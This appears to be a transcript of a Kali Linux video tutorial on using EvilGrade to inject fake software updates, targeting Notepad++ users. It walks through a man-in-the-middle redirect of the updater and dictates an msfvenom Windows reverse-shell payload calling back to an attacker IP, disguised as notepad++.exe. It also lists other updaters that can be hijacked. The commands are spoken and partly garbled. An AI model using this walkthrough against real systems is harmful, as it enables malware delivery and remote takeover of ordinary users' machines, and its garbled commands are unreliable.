Hey guys, welcome to the next tutorial of ethical hacking and penetration testing of Kali Linux. So all these tutorials that I have been teaching you, I have been telling you something that we can go ahead and inject our payloads or our malicious viruses through the updates, or I can go ahead and redirect people to my own websites by using the man-in-the-middle attack. So in this tutorial, I would be teaching you that practically as to how we can do that, and we would be using EvilGrade for this tutorial. And just before I proceed with EvilGrade, there's some people who would prefer to use Backtrack rather than Kali Linux, maybe because they're habituated or something. But Backtrack has already been discontinued if you don't know about that. And Backtrack was also good, but there were not a lot of tools in there. And as I will be teaching EvilGrade, you don't have EvilGrade in Backtrack. You need to specifically install that. So if you want to go and install that, you could go to the specific website and download EvilGrade. And you can download it from over here. You will be getting a TGZ file or something like that. And once you go ahead and download that, you can go ahead and use the tar space xf. If you go and download that over here, you can just type tar-xf and just type the name of the specific file that is for the EvilGrade, and it will extract. And after it's extracted, you can just type period slash and then the Perl file's name, and it will get installed. But over here in Kali Linux, the best part is that it is inbuilt. So I can just type EvilGrade and it will start. And as you can see, these are the loaded modules. Everything has been loaded. And so what is EvilGrade? That would be the first thing that would come in your mind. So EvilGrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. So it comes with pre-made binaries that are agents and a working default configuration for fast penetration testing. And it has the best part is that it has its own web server and DNS server modules. It's very easy to set up new settings, and it has also auto configuration when new binary agents are set. So extract the EvilGrade if you're using Backtrack and run it by using commands such as tar space xf fz and whatever it may be in the file's name. If there is an error, then you need to go and check over the internet why it has some kind of error, because mostly probably people who are running Backtrack may come to an error, but I would not be teaching you that because I am teaching this for Kali Linux, and Kali Linux is far or n times better than Backtrack. Even if you have some problem with that, then you need to go ahead and check why I am saying that, because Kali Linux is far more sophisticated and upgraded than Backtrack. That's why. So coming back to our own tutorial. So just go ahead and start these things, and the next time that I would be going is that I would be selecting something specific. So I'll see what different types of softwares are eligible so that we could go ahead and inject them. So I'll just type show show modules, and it will show all of these things, these applications which are you can say as they don't have good amount of security, and we can go ahead and inject our errors, our malicious files in between them. These are the files, so you need to know which file your target is using so that you could go ahead and let's say hijack that. So these are the Apple updates, that's a MacBook, and we have CCleaner. Most people use this app, or we have the let's say we have LinkedIn. People use this app. We have Nokia Software, Notepad++ is one of the most famous one, and I would be using that today. We have OpenOffice, and we have QuickTime that normal people use, Skype, Speedbit, SunJava, TeamViewer, VirtualBox, VBox, VMware. So we have, and the best part is Windows Update. I won't be using Windows Update. I will be teaching you that at a later point of time. Today I would be using the Notepad++ application. So in this tutorial, we would be targeting user who use Notepad++. So when they are updating that application automatically, it will be caught in my trap. So to use modules, simply go ahead and run configure Notepad+ and just hit enter. And after that, to view the options, you can set up the use command show options. And in the image over here, there's a virtual host. That means that when the victim update their Notepad+, it will open a URL notepad that is plus.sourceforge.net. So we will later see how we can go and use this address. And Notepad++ is from the website sourceforge.net. So all the updates will be downloaded from over there, but we would be slightly going ahead and injecting our own payload and going ahead and let's say for example redirect their website from sourceforge.net to our malicious payload in between and then redirect it to the source port so that updates will be installed along with our virus as well. So the next step is setting an agent. I will be configuring this agent to create a shell reverse TCP using MSF payload, but I believe MSF payload will be deprecated by now. So let me check, because the last time I used it was MSF payload. Yeah, MSF payload is deprecated and we will have to use the MSF Venom instead. I'll just close this and open a new one. So in order for us to do that, I will have to use the reverse shell TCP. So but before that, I'll just have to type set agent space apostrophe bracket and double apostrophe slash pentest slash exploit slash framework 3 slash MSF and Venom. I believe that's because I don't remember exactly. MSF Venom. Okay, just let me check where the folder is exactly. MSF Venom, and it would be MSF Venom Windows. I believe it's underscore. Okay, let me check. Okay, I believe that this pentest was for backtrack. Maybe it may have been changed. I believe it should be in OPD or something. Metasploit, and let me check. Let's just locate pen test. Okay, OPD Metasploit app, and let's locate MSF Venom. Okay, we have MSF Venom at OPD app MSF Venom. Perfect. MSF. Okay, I need to change these things. OPT slash. Okay, I'll just go down and close this and open it once more because I have already used that. So instead of me typing all of these things, to just use okay, perfect. Okay, I don't think these options would be available. So configure notepad++, and I need to go ahead and set agent, and over here I need to type where exactly these things are. So it would be slash, and in the previous tutorials it was in the pentest directory in backtrack, but over here it would be in the OPD. So let's go ahead and check where our MSF Venom is exactly. So we have MSF Venom over here in multiple places, but the one which we would be using would be the OPD slash Metasploit app place. So just copy it and paste it over here. MSF Venom space Windows slash shell underscore reverse underscore TCP, and you can just type the lhost name. Lhost equals to 192.168.236. Okay, reverse. Okay, I don't know what happened. Reverse underscore TCP lhost equals to 192.168.236.130. that is my IP address, and the L port, that is the local host port, equals to 1234x %OUT percentage slash, and now I have to type where it will go. So I'll just type temp slash notepad+.exe, and then I'll need to go ahead and just type percentage. I need to go ahead and close this out, percentage slash, and let me check if I missed anything. Perfect. Okay, so once I have done this, I will now be able to go ahead and I've created this fake update virus file, and once we do this, we now need to go ahead and load the MSF payload or the MSF Venom, whichever you have. We will use the Windows reverse shell TCP payload to open shell on the target when operation succeeded. And now we need to go ahead and make sure that the port 80 is empty, and we need to go ahead and redirect our person to our website, or not our website exactly, to our port, through which it would again go ahead and redirect itself after exploiting itself to the original SourceForge website. So that is it, guys, for this tutorial. In the next tutorial, I'll be teaching you how we can go. I will be continuing the same tutorial, and I'll be teaching you how we can go ahead and do that further.